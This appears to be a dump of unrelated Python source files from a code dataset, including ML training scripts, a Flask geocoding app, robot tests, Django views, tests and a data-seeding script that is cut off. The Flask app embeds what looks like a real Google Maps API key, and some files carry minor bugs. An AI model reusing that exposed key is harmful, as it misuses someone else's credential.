w = torch.normal(mean=0.0, std=0.01, size=(feature_dim, 1),
requires_grad=True)
b = torch.zeros((1), requires_grad=True)
net, loss = lambda X: linreg(X, w, b), squared_loss
# Train
animator = Animator(xlabel='epoch', ylabel='loss',
xlim=[0, num_epochs], ylim=[0.22, 0.35])
n, timer = 0, Timer()
for _ in range(num_epochs):
for X, y in data_iter:
l = loss(net(X), y).mean()
l.backward()
trainer_fn([w, b], states, hyperparams)
n += X.shape[0]
if n % 200 == 0:
timer.stop()
animator.add(n/X.shape[0]/len(data_iter),
(evaluate_loss(net, data_iter, loss),))
timer.start()
print(f'loss: {animator.Y[0][-1]:.3f}, {timer.avg():.3f} sec/epoch')
return timer.cumsum(), animator.Y[0]
# %%
def train_concise_ch11(trainer_fn, hyperparams, data_iter, num_epochs=4):
# Initialization
net = nn.Sequential(nn.Linear(5, 1))
def init_weights(m):
if type(m) == nn.Linear:
torch.nn.init.normal_(m.weight, std=0.01)
net.apply(init_weights)
optimizer = trainer_fn(net.parameters(), **hyperparams)
loss = nn.MSELoss()
# Note: L2 Loss = 1/2 * MSE Loss. PyTorch has MSE Loss which is slightly
# different from MXNet's L2Loss by a factor of 2. Hence we halve the loss
# value to get L2Loss in PyTorch
animator = Animator(xlabel='epoch', ylabel='loss',
xlim=[0, num_epochs], ylim=[0.22, 0.35])
n, timer = 0, Timer()
for _ in range(num_epochs):
for X, y in data_iter:
optimizer.zero_grad()
out = net(X)
y = y.reshape(out.shape)
l = loss(out, y)/2
l.backward()
optimizer.step()
n += X.shape[0]
if n % 200 == 0:
timer.stop()
animator.add(n/X.shape[0]/len(data_iter),
(evaluate_loss(net, data_iter, loss)/2,))
timer.start()
print(f'loss: {animator.Y[0][-1]:.3f}, {timer.avg():.3f} sec/epoch')
|
15,148 | dfbe89c2de7569e495b4c535430c4d0f5f743bca | #!flask/bin/python
from locLib import *
def concept2Indexes(concepts, vocabulary, maxConceptCount):
'''
concept2Indexes - Функция создание индексов концептов
вход:
concepts - концепты
vocabulary - словарь концептов
maxConceptCount - максимальное количество всех концептов словаря
выход:
список индексов всх концептов
'''
conceptsIndexes = []
for concept in concepts:
conceptIndex = 0
conceptInVocabulary = concept in vocabulary
if (conceptInVocabulary):
index = vocabulary[concept]
if (index < maxConceptCount):
conceptIndex = index
conceptsIndexes.append(conceptIndex)
return conceptsIndexes
def changeXTo01(trainVector, conceptsCount):
'''
changeXTo01 - Функция создания words of bag (преобразование одного короткого вектора
в вектор из 0 и 1)
вход:
trainVector - обучающий ветор
conceptsCount - длина библиотеки концептов
выход:
words of bag xTrain, yTrain
'''
out = np.zeros(conceptsCount)
for x in trainVector:
out[x] = 1
return out
def changeSetTo01(trainSet, conceptsCount):
'''
changeSetTo01 - Функция создания words of bag обучающей и проверочной выборки
(преобразование одного короткого вектора в вектор из 0 и 1)
вход:
trainVector - обучающий ветор
conceptsCount - длина библиотеки концептов
выход:
массив words of bag xTrain, yTrain
'''
out = []
for x in trainSet:
out.append(changeXTo01(x, conceptsCount))
return np.array(out)
|
15,149 | 47af12290701dfa4c90a605d4a9557bce238626a | import logging
import requests
from flask import Flask, render_template, request
app = Flask(__name__)
# api-endpoint
url = "https://maps.googleapis.com/maps/api/geocode/json?key=AIzaSyA_wOxjHNfPhmKu2zBo8N5HXsEpewgIQF0"
# [START form]
@app.route('/')
def index():
return render_template('form.html')
# [END form]
# [START result]
@app.route('/result', methods=['POST', 'GET'])
def api_message():
locate = request.form.get('location', None)
payload = {'address': locate}
response = requests.get(url=url, params=payload)
data = response.json()
if data['status'] != 'OK':
print "Error"
error = "Search came up with no results. Try Again."
return render_template(
'result.html',
passed="no",
message=error
)
else:
id = data['results'][0]["place_id"]
latitude = data['results'][0]['geometry']['location']['lat']
longitude = data['results'][0]['geometry']['location']['lng']
return render_template(
'result.html',
passed="yes",
id=id,
latitude=latitude,
longitude=longitude
)
# [END result]
if __name__ == '__main__':
app.run(debug=True)
@app.errorhandler(500)
def server_error(e):
# Log the error and stacktrace.
logging.exception('An error occurred during a request.')
return 'An internal error occurred.', 500
|
15,150 | 479ed5be2d1194d0f89d0f1cd76ab7fb21c7ef26 | # Copyright 2019 Jan Feitsma (Falcons)
# SPDX-License-Identifier: Apache-2.0
from robotScenarioBase import *
def testRobotInterface():
"""
A series of tests to check if all functionality provided by robotInterface works.
"""
print
print "TEST: simulation environment"
print "isSimulated =", robot.isSimulated()
print
print "TEST: shutdown flag"
print "isShutDown =", robot.isShutDown()
assert(robot.isShutDown() == False)
print
print "TEST: own robot ID"
print robot.myRobotId()
print
print "TEST: stop (nothing should happen)"
robot.stop()
print
print "TEST: enable ballHandlers"
robot.enableBallHandlers()
sleep(1)
print
print "TEST: disable ballHandlers"
robot.disableBallHandlers()
sleep(1)
print
print "TEST: velocity setpoint (half rotation)"
robot.setVelocity(0, 0, 1, 3.14)
print
print "TEST: get current position"
pos = robot.getPosition()
print "position =", pos
print
print "TEST: get current velocity"
vel = robot.getVelocity()
print "velocity =", vel
print
print "TEST: move a bit"
robot.move(pos.x, pos.y + 0.5, pos.Rz)
print
print "TEST: which robots are active"
print robot.activeRobots()
print
print "TEST: teammembers are all robots except self"
teamMembers = robot.teamMembers()
print teamMembers
assert(robot.myRobotId() not in teamMembers)
print
print "TEST: relative index"
print robot.myRelIndex()
print
print "TEST: ball possession as enum"
print robot.ballPossession()
print
print "TEST: ball possession as boolean"
print robot.hasBall()
print
print "TEST: does team see a ball"
print robot.seeBall()
print
print "TEST: closest obstacle"
print robot.findClosestObstacle(1, 6)
print
print "TEST: robot close to penalty spot"
print (robot.robotCloseBy(0, 6, 2.0) or robot.robotCloseBy(0, -6, 2.0))
print
if robot.seeBall():
print "TEST: ball position"
print robot.ballPosition()
print
print "TEST: ball velocity"
print robot.ballVelocity()
print
print "TEST: ball on same half"
print robot.ballOnSameHalf()
print
print "TEST: ball close to penalty spot"
print (robot.ballCloseBy(0, 6, 2.0) or robot.ballCloseBy(0, -6, 2.0))
print
print "TEST: get ball"
robot.getBall()
sleep(0.1) # give async wm thread a bit of time ...
assert(robot.hasBall())
print
|
15,151 | 89e9426b373a008045a8874c7447083be1f08959 | import hashlib
import subprocess
import os
from WMCore.Services.SiteDB.SiteDB import SiteDBJSON
from WMCore.Credential.Proxy import Proxy
__version__ = '1.0.3'
def getHashLfn(lfn):
"""
Provide a hashed lfn from an lfn.
"""
return hashlib.sha224(lfn).hexdigest()
def getFTServer(site, view, db, log):
"""
Parse site string to know the fts server to use
"""
country = site.split('_')[1]
query = {'key':country}
try:
fts_server = db.loadView('asynctransfer_config', view, query)['rows'][0]['value']
except IndexError:
log.info("FTS server for %s is down" % country)
fts_server = ''
return fts_server
def execute_command(command):
"""
_execute_command_
Function to manage commands.
"""
proc = subprocess.Popen(
["/bin/bash"], shell=True, cwd=os.environ['PWD'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
)
proc.stdin.write(command)
stdout, stderr = proc.communicate()
rc = proc.returncode
return stdout, stderr, rc
def getDNFromUserName(username, log, ckey = None, cert = None):
"""
Parse site string to know the fts server to use
"""
dn = ''
site_db = SiteDBJSON(config={'key': ckey, 'cert': cert})
try:
dn = site_db.userNameDn(username)
except IndexError:
log.error("user does not exist")
return dn
except RuntimeError:
log.error("SiteDB URL cannot be accessed")
return dn
return dn
def getProxy(userdn, group, role, defaultDelegation, logger):
"""
_getProxy_
"""
log.debug("Retrieving proxy for %s" % userdn)
proxy = Proxy(defaultDelegation)
proxyPath = proxy.getProxyFilename( True )
timeleft = proxy.getTimeLeft( proxyPath )
if timeleft is not None and timeleft > 3600:
return (True, proxyPath)
proxyPath = proxy.logonRenewMyProxy()
timeleft = proxy.getTimeLeft( proxyPath )
if timeleft is not None and timeleft > 0:
return (True, proxyPath)
return (False, None)
|
15,152 | e82c825211875573ee33e9dc19cee1d5480b1103 | import json
from LocalDir import *
import pickle
from os import listdir
from os.path import isfile, join
# list of json files, in case of folders with multiple files
onlyFiles = [f for f in listdir(sourceDir) if isfile(join(sourceDir, f))]
print(sourceDir)
print(onlyFiles)
allTweets = {}
failedRegex = 0
for file in onlyFiles:
with open(sourceDir + file) as jsonFile:
for line in jsonFile:
try:
tweet = json.loads(line, encoding=twitterEncoding)
tweetID = tweet['id_str']
allTweets[tweetID] = line
except:
failedRegex += 1
print("failed json loads: " + str(failedRegex))
with open(rawTweetByIdDictFile, 'wb') as f:
pickle.dump(allTweets, f)
|
15,153 | 8c8279fd5577c9e59d007a018a5d6c50e1d7f5e9 | from django.urls import path
from . import views
urlpatterns = [
path('',views.home,name='home'),
path('sign-up/',views.register,name='register'),
path('sign-in/',views.login,name='login'),
path('logout/',views.logout,name='logout'),
path('user-details/',views.details,name='user-details'),
path('delete-user/',views.delete_user,name='delete-user'),
path('update-details/',views.update_details,name='update-details'),
]
# urlpatterns = [] |
15,154 | ab51a2be99aace11e4d6b79f22efcdd2c1bdd6ee |
import argparse
import os
import sys
##############################################
parser = argparse.ArgumentParser()
parser.add_argument('--epochs', type=int, default=100)
parser.add_argument('--batch_size', type=int, default=128)
parser.add_argument('--lr', type=float, default=1e-2)
parser.add_argument('--eps', type=float, default=1.)
parser.add_argument('--dropout', type=float, default=0.5)
parser.add_argument('--act', type=str, default='relu')
parser.add_argument('--bias', type=float, default=0.)
parser.add_argument('--gpu', type=int, default=0)
parser.add_argument('--dfa', type=int, default=0)
parser.add_argument('--sparse', type=int, default=0)
parser.add_argument('--rank', type=int, default=0)
parser.add_argument('--init', type=str, default="glorot_uniform")
parser.add_argument('--save', type=int, default=0)
parser.add_argument('--name', type=str, default="imagenet_alexnet")
parser.add_argument('--load', type=str, default=None)
args = parser.parse_args()
if args.gpu >= 0:
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=str(args.gpu)
exxact = 0
if exxact:
val_path = '/home/bcrafton3/Data_SSD/ILSVRC2012/val/'
train_path = '/home/bcrafton3/Data_SSD/ILSVRC2012/train/'
else:
val_path = '/usr/scratch/bcrafton/ILSVRC2012/val/'
train_path = '/usr/scratch/bcrafton/ILSVRC2012/train/'
val_labels = './imagenet_labels/validation_labels.txt'
train_labels = './imagenet_labels/train_labels.txt'
IMAGENET_MEAN = [123.68, 116.78, 103.94]
##############################################
import keras
import tensorflow as tf
import numpy as np
np.set_printoptions(threshold=1000)
from lib.Model import Model
from lib.Layer import Layer
from lib.ConvToFullyConnected import ConvToFullyConnected
from lib.FullyConnected import FullyConnected
from lib.Convolution import Convolution
from lib.MaxPool import MaxPool
from lib.Dropout import Dropout
from lib.FeedbackFC import FeedbackFC
from lib.FeedbackConv import FeedbackConv
from lib.Activation import Activation
from lib.Activation import Relu
##############################################
def in_top_k(x, y, k):
x = tf.cast(x, dtype=tf.float32)
y = tf.cast(y, dtype=tf.int32)
_, topk = tf.nn.top_k(input=x, k=k)
topk = tf.transpose(topk)
correct = tf.equal(y, topk)
correct = tf.cast(correct, dtype=tf.int32)
correct = tf.reduce_sum(correct, axis=0)
return correct
##############################################
# Preprocessing (for both training and validation):
# (1) Decode the image from jpg format
# (2) Resize the image so its smaller side is 256 pixels long
def parse_function(filename, label):
image_string = tf.read_file(filename)
image_decoded = tf.image.decode_jpeg(image_string, channels=3) # (1)
image = tf.cast(image_decoded, tf.float32)
smallest_side = 256.0
height, width = tf.shape(image)[0], tf.shape(image)[1]
height = tf.to_float(height)
width = tf.to_float(width)
scale = tf.cond(tf.greater(height, width),
lambda: smallest_side / width,
lambda: smallest_side / height)
new_height = tf.to_int32(height * scale)
new_width = tf.to_int32(width * scale)
resized_image = tf.image.resize_images(image, [new_height, new_width]) # (2)
return resized_image, label
# Preprocessing (for training)
# (3) Take a random 227x227 crop to the scaled image
# (4) Horizontally flip the image with probability 1/2
# (5) Substract the per color mean `IMAGENET_MEAN`
# Note: we don't normalize the data here, as VGG was trained without normalization
def train_preprocess(image, label):
crop_image = tf.random_crop(image, [227, 227, 3]) # (3)
flip_image = tf.image.random_flip_left_right(crop_image) # (4)
means = tf.reshape(tf.constant(IMAGENET_MEAN), [1, 1, 3])
centered_image = flip_image - means # (5)
return centered_image, label
# Preprocessing (for validation)
# (3) Take a central 227x227 crop to the scaled image
# (4) Substract the per color mean `IMAGENET_MEAN`
# Note: we don't normalize the data here, as VGG was trained without normalization
def val_preprocess(image, label):
crop_image = tf.image.resize_image_with_crop_or_pad(image, 227, 227) # (3)
means = tf.reshape(tf.constant(IMAGENET_MEAN), [1, 1, 3])
centered_image = crop_image - means # (4)
return centered_image, label
##############################################
def get_validation_dataset():
label_counter = 0
validation_images = []
validation_labels = []
print ("building validation dataset")
for subdir, dirs, files in os.walk(val_path):
for file in files:
validation_images.append(os.path.join(val_path, file))
validation_images = sorted(validation_images)
validation_labels_file = open(val_labels)
lines = validation_labels_file.readlines()
for ii in range(len(lines)):
validation_labels.append(int(lines[ii]))
remainder = len(validation_labels) % args.batch_size
validation_images = validation_images[:(-remainder)]
validation_labels = validation_labels[:(-remainder)]
return validation_images, validation_labels
def get_train_dataset():
label_counter = 0
training_images = []
training_labels = []
f = open(train_labels, 'r')
lines = f.readlines()
labels = {}
for line in lines:
line = line.split(' ')
labels[line[0]] = label_counter
label_counter += 1
f.close()
print ("building train dataset")
for subdir, dirs, files in os.walk(train_path):
for folder in dirs:
for folder_subdir, folder_dirs, folder_files in os.walk(os.path.join(subdir, folder)):
for file in folder_files:
training_images.append(os.path.join(folder_subdir, file))
training_labels.append(labels[folder])
remainder = len(training_labels) % args.batch_size
training_images = training_images[:(-remainder)]
training_labels = training_labels[:(-remainder)]
return training_images, training_labels
###############################################################
filename = tf.placeholder(tf.string, shape=[None])
label = tf.placeholder(tf.int64, shape=[None])
###############################################################
val_imgs, val_labs = get_validation_dataset()
val_dataset = tf.data.Dataset.from_tensor_slices((filename, label))
val_dataset = val_dataset.shuffle(len(val_imgs))
val_dataset = val_dataset.map(parse_function, num_parallel_calls=4)
val_dataset = val_dataset.map(val_preprocess, num_parallel_calls=4)
val_dataset = val_dataset.batch(args.batch_size)
val_dataset = val_dataset.repeat()
val_dataset = val_dataset.prefetch(8)
###############################################################
train_imgs, train_labs = get_train_dataset()
train_dataset = tf.data.Dataset.from_tensor_slices((filename, label))
train_dataset = train_dataset.shuffle(len(train_imgs))
train_dataset = train_dataset.map(parse_function, num_parallel_calls=4)
train_dataset = train_dataset.map(train_preprocess, num_parallel_calls=4)
train_dataset = train_dataset.batch(args.batch_size)
train_dataset = train_dataset.repeat()
train_dataset = train_dataset.prefetch(8)
###############################################################
handle = tf.placeholder(tf.string, shape=[])
iterator = tf.data.Iterator.from_string_handle(handle, train_dataset.output_types, train_dataset.output_shapes)
features, labels = iterator.get_next()
features = tf.reshape(features, (-1, 227, 227, 3))
labels = tf.one_hot(labels, depth=1000)
train_iterator = train_dataset.make_initializable_iterator()
val_iterator = val_dataset.make_initializable_iterator()
###############################################################
if args.act == 'tanh':
act = Tanh()
elif args.act == 'relu':
act = Relu()
else:
assert(False)
###############################################################
weights_conv = './transfer/alexnet_weights.npy'
weights_fc = None
train_conv = weights_conv == None
train_fc = weights_fc == None
###############################################################
batch_size = tf.placeholder(tf.int32, shape=())
dropout_rate = tf.placeholder(tf.float32, shape=())
lr = tf.placeholder(tf.float32, shape=())
###############################################################
l0 = Convolution(input_shape=[batch_size, 227, 227, 3], filter_sizes=[11, 11, 3, 96], init=args.init, strides=[1,4,4,1], padding="VALID", activation=act, bias=args.bias, load=weights_conv, name='conv1', train=train_conv)
l1 = MaxPool(size=[batch_size, 55, 55, 96], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l2 = FeedbackConv(size=[batch_size, 27, 27, 96], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv1_fb')
l3 = Convolution(input_shape=[batch_size, 27, 27, 96], filter_sizes=[5, 5, 96, 256], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv2', train=train_conv)
l4 = MaxPool(size=[batch_size, 27, 27, 256], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l5 = FeedbackConv(size=[batch_size, 13, 13, 256], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv2_fb')
l6 = Convolution(input_shape=[batch_size, 13, 13, 256], filter_sizes=[3, 3, 256, 384], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv3', train=train_conv)
l7 = FeedbackConv(size=[batch_size, 13, 13, 384], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv3_fb')
l8 = Convolution(input_shape=[batch_size, 13, 13, 384], filter_sizes=[3, 3, 384, 384], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv4', train=train_conv)
l9 = FeedbackConv(size=[batch_size, 13, 13, 384], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv4_fb')
l10 = Convolution(input_shape=[batch_size, 13, 13, 384], filter_sizes=[3, 3, 384, 256], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv5', train=train_conv)
l11 = MaxPool(size=[batch_size, 13, 13, 256], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l12 = FeedbackConv(size=[batch_size, 6, 6, 256], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv5_fb')
l13 = ConvToFullyConnected(input_shape=[6, 6, 256])
l14 = FullyConnected(input_shape=6*6*256, size=4096, init=args.init, activation=act, bias=args.bias, load=weights_fc, name='fc1', train=train_fc)
l15 = Dropout(rate=dropout_rate)
l16 = FeedbackFC(size=[6*6*256, 4096], num_classes=1000, sparse=args.sparse, rank=args.rank, name='fc1_fb')
l17 = FullyConnected(input_shape=4096, size=4096, init=args.init, activation=act, bias=args.bias, load=weights_fc, name='fc2', train=train_fc)
l18 = Dropout(rate=dropout_rate)
l19 = FeedbackFC(size=[4096, 4096], num_classes=1000, sparse=args.sparse, rank=args.rank, name='fc2_fb')
l20 = FullyConnected(input_shape=4096, size=1000, init=args.init, bias=args.bias, load=weights_fc, name='fc3', train=train_fc)
###############################################################
model = Model(layers=[l0, l1, l2, l3, l4, l5, l6, l7, l8, l9, l10, l11, l12, l13, l14, l15, l16, l17, l18, l19, l20])
predict = tf.nn.softmax(model.predict(X=features))
weights = model.get_weights()
if args.dfa:
grads_and_vars = model.dfa_gvs(X=features, Y=labels)
else:
grads_and_vars = model.gvs(X=features, Y=labels)
train = tf.train.AdamOptimizer(learning_rate=lr, epsilon=args.eps).apply_gradients(grads_and_vars=grads_and_vars)
correct = tf.equal(tf.argmax(predict,1), tf.argmax(labels,1))
total_correct = tf.reduce_sum(tf.cast(correct, tf.float32))
top5 = in_top_k(predict, tf.argmax(labels,1), k=5)
total_top5 = tf.reduce_sum(tf.cast(top5, tf.float32))
###############################################################
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
train_handle = sess.run(train_iterator.string_handle())
val_handle = sess.run(val_iterator.string_handle())
###############################################################
results_filename = args.name + '.results'
f = open(results_filename, "w")
f.write(results_filename + "\n")
f.write("total params: " + str(model.num_params()) + "\n")
f.close()
###############################################################
train_accs = []
train_accs_top5 = []
val_accs = []
val_accs_top5 = []
phase = 0
lr_decay = args.lr
for ii in range(args.epochs):
sess.run(train_iterator.initializer, feed_dict={filename: train_imgs, label: train_labs})
train_total = 0.0
train_correct = 0.0
train_top5 = 0.0
for j in range(0, len(train_imgs), args.batch_size):
[_total_correct, _top5, _] = sess.run([total_correct, total_top5, train], feed_dict={handle: train_handle, batch_size: args.batch_size, dropout_rate: args.dropout, lr: lr_decay})
train_total += args.batch_size
train_correct += _total_correct
train_top5 += _top5
train_acc = train_correct / train_total
train_acc_top5 = train_top5 / train_total
if (j % (1000 * args.batch_size) == 0):
p = "train accuracy: %f %f" % (train_acc, train_acc_top5)
print (p)
f = open(results_filename, "a")
f.write(p + "\n")
f.close()
train_accs.append(train_acc)
train_accs_top5.append(train_acc_top5)
##################################################################
sess.run(val_iterator.initializer, feed_dict={filename: val_imgs, label: val_labs})
val_total = 0.0
val_correct = 0.0
val_top5 = 0.0
for j in range(0, len(val_imgs), args.batch_size):
[_total_correct, _top5] = sess.run([total_correct, total_top5], feed_dict={handle: val_handle, batch_size: args.batch_size, dropout_rate: 0.0, lr: 0.0})
val_total += args.batch_size
val_correct += _total_correct
val_top5 += _top5
val_acc = val_correct / val_total
val_acc_top5 = val_top5 / val_total
if (j % (1000 * args.batch_size) == 0):
p = "val accuracy: %f %f" % (val_acc, val_acc_top5)
print (p)
f = open(results_filename, "a")
f.write(p + "\n")
f.close()
val_accs.append(val_acc)
val_accs_top5.append(val_acc_top5)
if phase == 0:
phase = 1
print ('phase 1')
elif phase == 1:
dacc = val_accs[-1] - val_accs[-2]
if dacc <= 0.01:
lr_decay = 0.1 * args.lr
phase = 2
print ('phase 2')
elif phase == 2:
dacc = val_accs[-1] - val_accs[-2]
if dacc <= 0.005:
lr_decay = 0.05 * args.lr
phase = 3
print ('phase 3')
if args.save:
[w] = sess.run([weights], feed_dict={handle: val_handle, dropout_rate: 0.0, learning_rate: 0.0})
w['train_acc'] = train_accs
w['train_acc_top5'] = train_accs_top5
w['val_acc'] = val_accs
w['val_acc_top5'] = val_accs_top5
np.save(args.name, w)
print('epoch %d/%d' % (ii, args.epochs))
|
15,155 | 207b6b661734fa8be28bbaf42a5b37236d81e284 | # Rest Framework
from rest_framework import status
from rest_framework.test import APITestCase
# Project
from apps.shared.utils import reverse
from apps.shared import messages as msg
from .base import AuthTestCase, TEST_USER1, CURRENT_PASSWORD
NEW_PASSWORD = 'abc0987654321'
INVALID_PASSWORD = '123'
class ChangePasswordTest(APITestCase, AuthTestCase):
fixtures = ['user.yaml']
url = 'apps.gauth:change-password'
def _auth(self, data):
url = reverse('apps.gauth:auth')
return self.client.post(url, data)
def _change_password(self, password):
self._auth_admin()
url = reverse(self.url)
return self.client.put(url, {'password': password})
def test_change_password_invalid(self):
response = self._change_password(INVALID_PASSWORD)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data['password'][0],
msg.INVALID_PASSWORD_LENGTH)
self.assertEqual(response.data['password'][1],
msg.INVALID_PASSWORD_ENTIRELY_NUMERIC)
def test_change_password(self):
# Auth with current password
data = {'username': TEST_USER1, 'password': CURRENT_PASSWORD}
auth_response = self._auth(data)
self.assertEqual(auth_response.status_code, status.HTTP_200_OK)
# Change password
change_response = self._change_password(NEW_PASSWORD)
self.assertNotEqual(CURRENT_PASSWORD, NEW_PASSWORD)
self.assertEqual(change_response.status_code, status.HTTP_200_OK)
# Auth with new password
data = {'username': TEST_USER1, 'password': NEW_PASSWORD}
auth_response = self._auth(data)
self.assertEqual(auth_response.status_code, status.HTTP_200_OK)
|
15,156 | 3708a5505d5037abb923f09cef5242c769b78939 | count=0
for i in range(0, len(s)):
if s[i] == "a" or s[i] == "e" or s[i] == "i" or s[i] == "o" or s[i] == "u":
count += 1
print(count)
|
15,157 | 02336752fb2d603cc8abfe2a8a97a9fb22480e95 | from bson import ObjectId
from utility_functions import *
from bindings import database
from business_methods import User
def clean_id(x):
if '_id' in x.keys():
x['id'] = str(x['_id'])
del x['_id']
elif x['id'] is not None:
x['id'] = str(x['id'])
return x
def preprocess(x, requester_id=None):
x = clean_id(x)
if requester_id and requester_id != '0':
requester = dict(database['users'].find_one({'_id': ObjectId(requester_id)},
{'_id': 1, 'email': 1, "following": 1}
))
x["badges"] = []
if x == requester:
return x
if {'id': ObjectId(x['id'])} in requester["following"]:
x["badges"].append({"category": "social", "name": "You follow"})
if True:
x["badges"].append({"category": "match", "name": "Watchout"})
#Setting an image if not provided
if 'imageUrl' not in x.keys():
x['imageUrl'] = 'data:image/png;base64, ' + generate_profile_image().decode('utf-8')
return x
def get_data(query, requester_id=None, return_unique=None):
companies = database['companies'].find(query, {'password': 0})
companies = [preprocess(x, requester_id) for x in companies]
if return_unique is False:
return {'body': companies}
if len(companies) == 1:
return companies[0]
return {'body': companies}
|
15,158 | 9a4993632acd916a59889e2a2d7cf1959e1ad3c9 | import argparse
import datetime
import os
import random
import sys
from collections import defaultdict
PROJECT_PATH = os.sep.join(os.path.realpath(__file__).split(os.sep)[:-2])
sys.path.append(PROJECT_PATH)
os.environ['DJANGO_SETTINGS_MODULE'] = 'fufufuu.settings'
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
from django.contrib.webdesign import lorem_ipsum
from fufufuu.comment.models import Comment
from fufufuu.blog.models import BlogEntry
from fufufuu.account.models import User
from fufufuu.core.languages import Language
from fufufuu.core.enums import SiteSettingKey
from fufufuu.core.models import SiteSetting
from fufufuu.core.utils import slugify, convert_markdown
from fufufuu.dmca.models import DmcaAccount
from fufufuu.manga.enums import MangaCategory, MangaStatus
from fufufuu.manga.models import Manga, MangaTag, MangaPage
from fufufuu.report.enums import ReportStatus, ReportMangaType
from fufufuu.report.models import ReportManga
from fufufuu.tag.enums import TagType
from fufufuu.tag.models import Tag, TagData, TagAlias
#-------------------------------------------------------------------------------
CONFIGURATION = {
'default': {
'BLOG': 30,
'COMMENTS': [0, 0, 0, 0, 0, 1, 2, 3],
'MANGA': 3000,
'REPORTS': 300,
'TAGS': 600,
'TAGS_FK': 30,
'USERS': 5,
},
'test': {
'BLOG': 1,
'COLLECTIONS': 1,
'COMMENTS': [1],
'MANGA': 1,
'REPORTS': 1,
'TAGS': 1,
'TAGS_FK': 1,
'USERS': 1,
}
}
CHUNK_SIZE = 100
#-------------------------------------------------------------------------------
def timed(func):
"""
use @timed to decorate a function that will print out the time it took
for this function to run.
"""
def inner(*args, **kwargs):
start = datetime.datetime.now()
result = func(*args, **kwargs)
finish = datetime.datetime.now()
print('\t{} - {}'.format(func.__name__, finish-start))
return result
return inner
#-------------------------------------------------------------------------------
class DataCreator:
def __init__(self, configuration):
self.config = CONFIGURATION[configuration]
@timed
def create_users(self):
def create_user_helper(username, **kwargs):
user_data = {'username': username}
user_data.update(**kwargs)
user = User(**user_data)
user.set_password('password')
user.save()
return user
self.user = create_user_helper('testuser', is_staff=True, is_moderator=True)
self.user.dmca_account = DmcaAccount.objects.create(
name='Sample DMCA Account',
email='dmca@example.com',
website='http://example.com/dmca',
)
for i in range(self.config['USERS']):
create_user_helper('testuser{}'.format(i))
@timed
def create_tags(self):
tag_list = []
for tag_type in TagType.manga_m2m:
for i in range(1, self.config['TAGS']+1):
name = '{} {}'.format(TagType.choices_dict[tag_type], i)
tag = Tag(tag_type=tag_type, name=name, slug=slugify(name), created_by=self.user, updated_by=self.user)
tag_list.append(tag)
Tag.objects.bulk_create(tag_list)
@timed
def create_tag_aliases(self):
tag_alias_list = []
for tag in Tag.objects.all():
i = 1
while random.random() < 0.2:
language = random.choice([Language.ENGLISH, Language.JAPANESE])
tag_alias = TagAlias(tag=tag, language=language, name='{} - Alias {}'.format(tag.name, i))
tag_alias_list.append(tag_alias)
i += 1
TagAlias.objects.bulk_create(tag_alias_list)
@timed
def create_tag_data(self):
for language in ['en', 'ja']:
tag_data_list = []
for tag in Tag.objects.all():
tag_data_list.append(TagData(
tag=tag,
language=language,
markdown='Tag Data - {} - {}'.format(tag.name, language),
html='Tag Data - {} - {}'.format(tag.name, language),
created_by=self.user,
updated_by=self.user,
))
TagData.objects.bulk_create(tag_data_list)
@timed
def create_manga(self):
manga_category_keys = list(MangaCategory.choices_dict)
manga_list = []
for i in range(1, self.config['MANGA']+1):
title = 'Test Manga {}'.format(i)
manga = Manga(
title=title,
slug=slugify(title),
status=MangaStatus.PUBLISHED,
category=random.choice(manga_category_keys),
language=random.choice(['en'] * 9 + ['ja'] * 1),
uncensored=random.random() < 0.05,
published_on=timezone.now(),
created_by=self.user,
updated_by=self.user,
)
manga_list.append(manga)
Manga.objects.bulk_create(manga_list)
two_days_ago = timezone.now() - timezone.timedelta(days=2)
Manga.objects.update(created_on=two_days_ago, updated_on=two_days_ago, published_on=two_days_ago)
@timed
def assign_manga_tank(self):
manga_id_set = set(Manga.published.all().values_list('id', flat=True))
for i in range(1, self.config['TAGS_FK']+1):
tank_name = 'Tank {}'.format(i)
tank = Tag(tag_type=TagType.TANK, name=tank_name, slug=slugify(tank_name), created_by=self.user, updated_by=self.user)
tank.save(self.user)
tank_manga_count = random.randint(1, min(12, len(manga_id_set)))
tank_manga_id_set = random.sample(manga_id_set, tank_manga_count)
chapter_dict = defaultdict(int)
for manga_id in tank_manga_id_set:
manga = Manga.objects.get(id=manga_id)
chapter_dict[manga.language] += 1
manga.tank = tank
manga.tank_chapter = chapter_dict[manga.language]
manga.save(updated_by=manga.updated_by)
manga_id_set.remove(manga_id)
@timed
def assign_manga_collection(self):
manga_id_set = set(Manga.published.all().values_list('id', flat=True))
for i in range(1, self.config['TAGS_FK']+1):
collection_name = 'Collection {}'.format(i)
collection = Tag(tag_type=TagType.COLLECTION, name=collection_name, slug=slugify(collection_name), created_by=self.user, updated_by=self.user)
collection.save(self.user)
tank_manga_count = random.randint(1, min(12, len(manga_id_set)))
tank_manga_id_set = random.sample(manga_id_set, tank_manga_count)
part_dict = defaultdict(int)
for manga_id in tank_manga_id_set:
manga = Manga.objects.get(id=manga_id)
part_dict[manga.language] += 1
manga.collection = collection
manga.collection_part = part_dict[manga.language]
manga.save(updated_by=manga.updated_by)
manga_id_set.remove(manga_id)
@timed
def create_manga_tags(self):
tag_dict = defaultdict(list)
for tag in Tag.objects.all():
tag_dict[tag.tag_type].append(tag)
tag_content_count = len(tag_dict[TagType.CONTENT])
def _create_manga_tags(manga_list):
manga_tag_list = []
for manga in manga_list:
tag_list = []
